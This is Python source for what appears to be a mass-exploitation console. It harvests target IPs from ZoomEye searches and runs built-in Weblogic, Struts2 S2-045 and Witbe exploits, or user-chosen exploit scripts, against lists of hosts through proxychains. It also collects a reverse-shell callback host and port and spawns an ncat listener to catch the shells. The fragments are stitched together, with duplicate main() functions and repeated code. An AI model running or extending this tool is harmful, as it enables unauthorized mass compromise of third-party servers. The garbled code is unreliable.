def main():
'''
manage procedure
'''
answ = str(
input(colors.CYAN + '[?] Use ip_list.txt as target list? [y/n] ' +
colors.END)).strip()
if answ.lower() == 'n':
os.system("ls data")
SessionParameters.IP_LIST = console.input_check(
'[=] Choose your target IP list, eg. ip_list.txt ',
allow_blank=False)
while True:
try:
cmd = input(colors.CYAN + colors.BOLD + colors.UNDERLINE +
"\nmec" + colors.END + colors.CYAN + colors.BOLD +
" > " + colors.END)
try:
execute(cmd)
except (KeyboardInterrupt, EOFError, SystemExit):
sys.exit(0)
except KeyboardInterrupt:
try:
answ = input("\n[?] Are you sure to exit? [y/n] ")
except KeyboardInterrupt:
print("\n[-] Okay okay, exiting immediately...")
check_kill_process('ss-proxy')
sys.exit(0)
if answ.lower() == 'y':
check_kill_process('ss-proxy')
sys.exit(0)
else:
continue
def api_test():
'''
get verified with zoomeye
'''
amnt = int(
console.input_check(
"[*] How many results do you want? (10 IPs on each page) ",
check_type=int).strip())
threads = []
api = ZoomEyeAPI('zoomeye.conf')
try:
print(colors.BLUE + '[*] Crawling fetched pages from ZoomEye...' +
colors.END)
access_token = api.login()
headers = {
'Authorization': 'JWT ' + access_token,
}
except TypeError:
console.print_error('[-] Invalid access token')
return
status = threading.Thread(target=progress, args=(ZoomEyeAPI.OUTFILE, ))
status.setDaemon(True)
status.start()
limit = 0
for page in range(1, int(amnt / 10)):
thd = threading.Thread(target=crawler,
args=(
ZoomEyeAPI.QRY,
amnt,
page,
headers,
))
threads.append(thd)
for job in threads:
job.setDaemon(True)
job.start()
if limit == 0 or limit == 10:
limit = 0
job.join()
limit += 1
job.setDaemon(True)
job.start()
if limit == 0 or limit == 10:
limit = 0
job.join()
limit += 1
def main():
'''
put things together
'''
try:
api_test()
print('\n')
except BaseException:
pass
if __name__ == '__main__':
try:
ZoomEyeAPI.QRY = console.input_check("[*] Your query is: ",
allow_blank=False)
ZoomEyeAPI.OUTFILE = './data/zoomeye-{}.txt'.format('-'.join(
ZoomEyeAPI.QRY.replace(':', '_').split()))
main()
except (EOFError, KeyboardInterrupt, SystemExit):
print('\n[*] Exiting...')
else:
debug_traceback()
def attack():
'''
handles attack command
'''
if input_check('[?] Do you wish to use proxychains? [y/n] ',
choices=['y', 'n']) == 'y':
SessionParameters.USE_PROXY = True
else:
SessionParameters.USE_PROXY = False
answ = input_check('\n[?] Do you wish to use\
\n\n [a] built-in exploits\
\n [m] or launch your own manually?\
\n\n[=] Your choice: ',
choices=['a', 'm'])
if answ == 'a':
print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' +
colors.END + '\n')
print(console.BUILT_IN)
answ = input_check('[=] Your choice: ',
check_type=int,
choices=['0', '1', '2', '3', '4'])
try:
if answ == '2':
console.print_error("\n[-] Under development")
elif answ == '1':
console.print_error('\n[-] Under development')
elif answ == '0':
scanner(ExecExp.weblogic())
elif answ == '3':
scanner(ExecExp.s2_045())
elif answ == '4':
scanner(ExecExp.witbe())
except BaseException:
console.print_error("[-] We have an error executing exploit")
debug_except()
elif answ == 'm':
print(colors.CYAN + colors.UNDERLINE + colors.BOLD +
"\nWelcome, in here you can choose your own exploit\n" +
colors.END)
print(colors.CYAN + '[*] Here are available exploits:\n' + colors.END)
list_exp()
exploit = input(
"\n[*] Enter the path (eg. joomla/rce.py) of your exploit: "
).strip()
jobs = int(
input_check("[?] How many processes each time? ", check_type=int))
custom_args = []
answ = input_check("[?] Do you need a reverse shell [y/n]? ",
choices=['y', 'n'])
if answ == 'y':
lhost = input("[*] Where do you want me to send shells? ").strip()
lport = input_check(
"[*] and at what port? (make sure you have access to that port) ",
check_type=int)
custom_args = ['-l', lhost, '-p', lport]
answ = input_check(
'[*] Do you need me to start a listener? [y/n] ',
choices=['y', 'n'])
if answ == 'y':
print("\n[*] Spawning ncat listener in new window...\n")
try:
subprocess.Popen(args=[
"gnome-terminal",
"--command=ncat -nklvp " + lport + " -m 1000"
],
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except BaseException:
print(
colors.YELLOW +
"[-] Could not launch our listener, do you have GNOME-Terminal installed?"
+ colors.END + '\n')
else:
print(
"[*] Okay, just make sure you receive the reverse shells\n"
)
else:
pass
custom_args += input(
"[*] args for this exploit (target IP is handled already) ").strip(
).split()
exec_path = exploit.split('/')[1:]
work_path = exploit.split('/')[:-1]
delimtr = '/'
exec_path = delimtr.join(exec_path)
work_path = delimtr.join(work_path)
delimtr = ' '
print(
colors.BLUE + '[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(
exec_path), delimtr.join(custom_args))
scanner_args = (exploit, work_path, exec_path, custom_args, jobs)
scanner(scanner_args)
else:
console.print_error('[-] Invalid input')